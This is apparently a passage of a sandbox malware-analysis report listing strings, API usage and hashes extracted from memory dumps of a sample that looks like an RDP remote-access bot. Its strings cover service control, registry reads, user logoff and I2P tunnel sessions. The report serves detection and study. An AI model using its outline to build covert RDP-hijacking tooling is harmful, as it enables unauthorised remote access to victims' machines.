    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true
    • Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
    • Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd
    Similarity
    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
    • API String ID: 1412730629-3633878399
    • Opcode ID: 4e7cc123c9a819827e20a483d8cb600ba998d4310189115dfd21db2416d51342
    • Instruction ID: e0b7593fa49ea36a448045ee3f1e9fdd9d9c63ee185a46e01c6503d464804c50
    • Opcode Fuzzy Hash: 4e7cc123c9a819827e20a483d8cb600ba998d4310189115dfd21db2416d51342
    • Instruction Fuzzy Hash: 825106A1E0E70382FB316F18A8843792291EF093A4F244736C5FE062F5DE6DA9C58E55
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
    • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
    • API String ID: 1423203057-455140666
    • Opcode ID: ed353ceca3dbb001e75364d94296b3dd79ad6c528b8496316adeca29f8f96bff
    • Instruction ID: 6a3f409d6d52d21fcf6f514a346f4e84858edf1ad0c85911b19234f021fcc43f
    • Opcode Fuzzy Hash: ed353ceca3dbb001e75364d94296b3dd79ad6c528b8496316adeca29f8f96bff
    • Instruction Fuzzy Hash: A4A102A3B0D68293FE108B01E4023B9675AAB44F84F454835EE4DD77A6DE3EE545E30A
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: OpenQueryValuefflushfwrite
    • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
    • API String ID: 1980715187-910542497
    • Opcode ID: 7c37e71a4c9cbcdd55fd5de521ab0ff515261aaf5fd0eb76ebcbccddd1d4032b
    • Instruction ID: 10e75f1bdd9d01414e146f04d8e055ce12309d3f6770e846837268a77cd88ff0
    • Opcode Fuzzy Hash: 7c37e71a4c9cbcdd55fd5de521ab0ff515261aaf5fd0eb76ebcbccddd1d4032b
    • Instruction Fuzzy Hash: 28A11F62E1C70783FA209B40A4413B9235CAF01748F540536DA5EE67A2FE6FE995F34B
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
    • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
    • API String ID: 871770459-375624272
    • Opcode ID: 40f04a75b51a2e9e2ef9d3246091da1038eb2d015d0143044c07b84bd8fa9eae
    • Instruction ID: a3980a4562081ac17fe3bbbe93c7de528474342a2e74807ea60c5f72728995ac
    • Opcode Fuzzy Hash: 40f04a75b51a2e9e2ef9d3246091da1038eb2d015d0143044c07b84bd8fa9eae
    • Instruction Fuzzy Hash: 82515064A09E0389FA549B17E81037D2251AF60BB4F5403F1E83E67BF1EE7DE4868748
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
    • API String ID: 2122475568-588975189
    • Opcode ID: d9f4b9ce3a928d9979f129f9ae62a71057fc18060ba1282713374b8aa13e1647
    • Instruction ID: c5aced74871534d5eb0c1844f400feed744b6f2b0b7c5e82c87440f737113b9d
    • Opcode Fuzzy Hash: d9f4b9ce3a928d9979f129f9ae62a71057fc18060ba1282713374b8aa13e1647
    • Instruction Fuzzy Hash: 90513FB6A08B4296EB50CF64E44436A77A1FB89B88F444137DACD437A8EF7CE945C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
    • API String ID: 2122475568-588975189
    • Opcode ID: 5f722c4a9db5caff0a9512cade735875657457e76d6ab67cd837017c8794a22c
    • Instruction ID: 6d2ad870a2054a6735b16fcb730216d56c38b52ba2adb46a11c61f887e4d4f3a
    • Opcode Fuzzy Hash: 5f722c4a9db5caff0a9512cade735875657457e76d6ab67cd837017c8794a22c
    • Instruction Fuzzy Hash: 005130B6A08B4296EB50CF24E44436977A1FB89B48F444137DACD437A8DF7CE945C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
    • API String ID: 2122475568-588975189
    • Opcode ID: 680665ad80dbd839f89f1888cd9b1286b57fa87c8533a93014bac34192691f53
    • Instruction ID: 0d0e8ace6d916a5f75132f68f8ea2ba1c0d8bc77323ae6645fbffe8a7d850492
    • Opcode Fuzzy Hash: 680665ad80dbd839f89f1888cd9b1286b57fa87c8533a93014bac34192691f53
    • Instruction Fuzzy Hash: 55513FB6A08B4296EB50CF24E44436A77A1FB89B88F444137DACD437A8EF7CE945C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
    • API String ID: 2122475568-588975189
    • Opcode ID: 7f02770f6dceb336f674d9739dcb427619bedb638fdf82b87115723d2eee471c
    • Instruction ID: cdbb8d64e08329f0f2923e01f73396efe81ab4e793a25816cd1e7eda32656b94
    • Opcode Fuzzy Hash: 7f02770f6dceb336f674d9739dcb427619bedb638fdf82b87115723d2eee471c
    • Instruction Fuzzy Hash: 7C513FB6A08B4296EB50CF24E44436A77A1FB89B88F444137DACD437A8EF7CE945C700
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
    • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
    • API String ID: 546114577-3142219161
    • Opcode ID: 3bdce6e1a4986cffe8a71d2927b48b3e338f07e2e05f0671271003f466fb1071
    • Instruction ID: bf5e9abcc08587c8ec2ffa1d6ea585ec08ebf1b6cecc852c406a7af8f22da45d
    • Opcode Fuzzy Hash: 3bdce6e1a4986cffe8a71d2927b48b3e338f07e2e05f0671271003f466fb1071
    • Instruction Fuzzy Hash: 094127A0F0CB0792FB688714E8C53B816A1AF18744FA50437CACE462F7DE6DA988C351
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
    • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
    • API String ID: 610085118-1825955162
    • Opcode ID: 843ef7f08b1eddbb2451e73753f8425bc2b5ba87fcf09f84b56d6d1c7b6bada2
    • Instruction ID: eb3681ad5bd453d3687cc46048373acdb9d2652d738ed0774ebaeaafa2320175
    • Opcode Fuzzy Hash: 843ef7f08b1eddbb2451e73753f8425bc2b5ba87fcf09f84b56d6d1c7b6bada2
    • Instruction Fuzzy Hash: DD512A25A09E42CAF6158B17F8402796761EFA4BB0F5401B6DA6E67B74DF3CE9818308
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
    • API String ID: 1721699506-2819899730
    • Opcode ID: 65f318fae4b60edf188fa2be80c067e3a52f136fd7890af5129330c153f06364
    • Instruction ID: e0699e00c6dbefae65b4895684cd75afc276cfe042cde7a8c629e90d9b5a0977
    • Opcode Fuzzy Hash: 65f318fae4b60edf188fa2be80c067e3a52f136fd7890af5129330c153f06364
    • Instruction Fuzzy Hash: 52618463A1C54B87FB204B54E9003B82359BF80744F990932E90DEB592DE7EE985B30F
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
    • Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
    • Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd
    Similarity
    • API ID: strlen$CompareCriticalEnterFileSectionTime
    • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
    • API String ID: 3718746087-844192579
    • Opcode ID: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
    • Instruction ID: 46635582cd825151c8c770f960af88a670e61997bce69536e25a8ffc247c797e
    • Opcode Fuzzy Hash: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
    • Instruction Fuzzy Hash: C251D621B0C68382FB219B25A5A03FA56A19F85BC4F480073EACD4B7F7EE6CD9058751
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true
    • Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
    • Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd
    Similarity
    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
    • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
    • API String ID: 2654219296-2700516951
    • Opcode ID: e541061a84d68e4215e0cae13377071a3c265754cb899979e921b507e1948460
    • Instruction ID: 51d6ef5701fce58ef4520f080e70ac3fe16538c9256d228f1d44257025f18317
    • Opcode Fuzzy Hash: e541061a84d68e4215e0cae13377071a3c265754cb899979e921b507e1948460
    • Instruction Fuzzy Hash: 1A410A25A09E46C9EF549F13D8502782261AF68F74F0803F5C93E6A7F5DE3CE4818358
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: strcpystrlen$strcmp
    • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
    • API String ID: 245486318-5999096
    • Opcode ID: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
    • Instruction ID: 256d356b22632069ab50eb9623f58b3479342138014ee72aa66ac9c57a7b4f1f
    • Opcode Fuzzy Hash: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
    • Instruction Fuzzy Hash: FF713965E0DE5E83EA209B279D103B92250AF457B4F5443B1DDBD077F9EEBCA8018341
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
    • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
    • API String ID: 3562457520-1478336053
    • Opcode ID: dd29253f3d904388d58b3e7a2cef3793c1ba75d40d834335f78e58db029eae68
    • Instruction ID: 859200925f93ac0fd1ded349eb32646b2187355702e340e3ef6423b027c15d20
    • Opcode Fuzzy Hash: dd29253f3d904388d58b3e7a2cef3793c1ba75d40d834335f78e58db029eae68
    • Instruction Fuzzy Hash: C7515616E1C607A3FB205B9094A03B823BE9F45754F101A36D50EE66D3EE5FA984B34F
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true
    • Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
    • Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd
    Similarity
    • API ID: Heap$Process$AllocFree$fflushfwritestrlen
    • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
    • API String ID: 1135201459-1870638116
    • Opcode ID: d9a8ec916b7675763b8e0852a7eaaf342cbe35f40ecd2bcee3c7ee19bebd52f9
    • Instruction ID: 309d18a9d04cbe1f4ea2cbc6265825d9059d312cd70f918bd249a7bd30f3d454
    • Opcode Fuzzy Hash: d9a8ec916b7675763b8e0852a7eaaf342cbe35f40ecd2bcee3c7ee19bebd52f9
    • Instruction Fuzzy Hash: 91318D51A0AE8E86FE509B17EC547F96350BF94BE0F5840B4D98D463F9EEACE5048740
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd
    Similarity
    • API ID: Heap$Process$AllocFreestrcpystrlen
    • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
    • API String ID: 925994320-1558387473
    • Opcode ID: ff4aa0e7a8c90f478eecc01f71bf0da391492fff23dc6814b9622291a2ad2d71
    • Instruction ID: d87c4d601074a3592524eddd590a8ad5158b29c86b72773038263cfd86b2a6d1
    • Opcode Fuzzy Hash: ff4aa0e7a8c90f478eecc01f71bf0da391492fff23dc6814b9622291a2ad2d71
    • Instruction Fuzzy Hash: CA419FA1A09B4685EA44AF25E8443BD77A1FF84B84F440436EE9E073F6DE7CE845C310
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true
    • Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
    • Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd
    Similarity
    • API ID: strlen
    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
    • API String ID: 39653677-3302659514
    • Opcode ID: 7b861545304d1f514fcde138a12ecea94f5104ea430eaf2499474c994248ce49
